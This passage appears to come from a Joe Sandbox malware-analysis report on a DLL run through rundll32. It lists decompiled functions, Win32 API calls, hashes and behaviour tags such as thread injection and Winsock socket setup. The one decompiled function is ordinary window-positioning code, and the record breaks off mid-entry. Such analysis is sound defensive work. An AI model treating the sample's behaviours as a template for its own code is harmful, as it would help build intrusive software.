                                                                                                                      0x1002a847
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002a847
                                                                                                                      0x1002a814
                                                                                                                      0x1002a814
                                                                                                                      0x1002a819
                                                                                                                      0x1002a820
                                                                                                                      0x1002a81b
                                                                                                                      0x1002a81b
                                                                                                                      0x1002a81b
                                                                                                                      0x1002a824
                                                                                                                      0x00000000
                                                                                                                      0x1002a826
                                                                                                                      0x1002a82f
                                                                                                                      0x1002a849
                                                                                                                      0x1002a849
                                                                                                                      0x1002a84c
                                                                                                                      0x00000000
                                                                                                                      0x1002a84e
                                                                                                                      0x1002a84e
                                                                                                                      0x1002a851
                                                                                                                      0x1002a853
                                                                                                                      0x1002a853
                                                                                                                      0x1002a856
                                                                                                                      0x1002a857
                                                                                                                      0x1002a85d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002a85d
                                                                                                                      0x1002a831
                                                                                                                      0x1002a831
                                                                                                                      0x1002a831
                                                                                                                      0x1002a861
                                                                                                                      0x1002a865
                                                                                                                      0x1002a865
                                                                                                                      0x1002a82f
                                                                                                                      0x1002a824
                                                                                                                      0x1002a800
                                                                                                                      0x1002a800
                                                                                                                      0x1002a80a
                                                                                                                      0x1002a80e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002a80e
                                                                                                                      0x00000000
                                                                                                                      0x1002a7fe
                                                                                                                      0x1002a85f
                                                                                                                      0x1002a85f
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 656273425-0
                                                                                                                      • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                      • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1001DDC0(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10014B42();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                                      0x1001aa48
                                                                                                                      0x1001aa48
                                                                                                                      0x1001aa4f
                                                                                                                      0x1001aa52
                                                                                                                      0x1001aa5a
                                                                                                                      0x1001aa5d
                                                                                                                      0x1001aa62
                                                                                                                      0x1001aa70
                                                                                                                      0x1001aa82
                                                                                                                      0x1001aa72
                                                                                                                      0x1001aa75
                                                                                                                      0x1001aa75
                                                                                                                      0x1001aa88
                                                                                                                      0x1001aa8c
                                                                                                                      0x1001aa98
                                                                                                                      0x1001aaa0
                                                                                                                      0x1001aaa2
                                                                                                                      0x1001aaa2
                                                                                                                      0x1001aaa0
                                                                                                                      0x1001aa64
                                                                                                                      0x1001aa64
                                                                                                                      0x1001aa64
                                                                                                                      0x1001aa64
                                                                                                                      0x1001aaa4
                                                                                                                      0x1001aab2
                                                                                                                      0x1001aabb
                                                                                                                      0x1001ab5b
                                                                                                                      0x1001ab62
                                                                                                                      0x1001ab69
                                                                                                                      0x1001ab73
                                                                                                                      0x1001aac1
                                                                                                                      0x1001aac3
                                                                                                                      0x1001aac8
                                                                                                                      0x1001aad3
                                                                                                                      0x1001aadc
                                                                                                                      0x1001aadc
                                                                                                                      0x1001aad3
                                                                                                                      0x1001aae0
                                                                                                                      0x1001aae7
                                                                                                                      0x1001ab28
                                                                                                                      0x1001ab37
                                                                                                                      0x1001ab44
                                                                                                                      0x1001aae9
                                                                                                                      0x1001aae9
                                                                                                                      0x1001aaf0
                                                                                                                      0x1001aaf2
                                                                                                                      0x1001aaf2
                                                                                                                      0x1001ab02
                                                                                                                      0x1001ab15
                                                                                                                      0x1001ab1f
                                                                                                                      0x1001ab1f
                                                                                                                      0x1001aae7
                                                                                                                      0x1001ab82
                                                                                                                      0x1001ab87
                                                                                                                      0x1001ab8c
                                                                                                                      0x1001ab90
                                                                                                                      0x1001ab93
                                                                                                                      0x1001ab9a
                                                                                                                      0x1001aba2
                                                                                                                      0x1001abaa
                                                                                                                      0x1001abb2
                                                                                                                      0x1001abb9
                                                                                                                      0x1001abbe
                                                                                                                      0x1001abca
                                                                                                                      0x1001abd2
                                                                                                                      0x1001abd2
                                                                                                                      0x1001abc0
                                                                                                                      0x1001abc0
                                                                                                                      0x1001abc0
                                                                                                                      0x1001abd8
                                                                                                                      0x1001abe7
                                                                                                                      0x1001abef
                                                                                                                      0x1001abef
                                                                                                                      0x1001abda
                                                                                                                      0x1001abda
                                                                                                                      0x1001abda
                                                                                                                      0x1001ac07

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetParent.USER32(?), ref: 1001AA75
                                                                                                                      • SendMessageA.USER32 ref: 1001AA98
                                                                                                                      • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                      • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 808654186-3887548279
                                                                                                                      • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                      • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 100161DE
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                      • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                      • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3191170017-0
                                                                                                                      • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                      • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                      • API String ID: 667068680-3617302793
                                                                                                                      • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                      • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                      • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                      • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                      • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                      • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                      • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                        • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1509511306-0
                                                                                                                      • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                      • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                      • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                        • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                        • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                      • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                      • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                      • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                        • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                      • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                      • String ID: AfxOldWndProc423
                                                                                                                      • API String ID: 2702501687-1060338832
                                                                                                                      • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                      • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                      • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                      • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                      • _printf.LIBCMT ref: 10012F79
                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                      • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                      • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                      • API String ID: 4222005279-2156106531
                                                                                                                      • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                      • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                      • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                      • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                      • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                      • __lock.LIBCMT ref: 10035229
                                                                                                                      • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                      • API String ID: 1036688887-2843748187
                                                                                                                      • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                      • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                      • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                      • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                      • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                      • String ID: MS Shell Dlg
                                                                                                                      • API String ID: 1736106359-76309092
                                                                                                                      • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
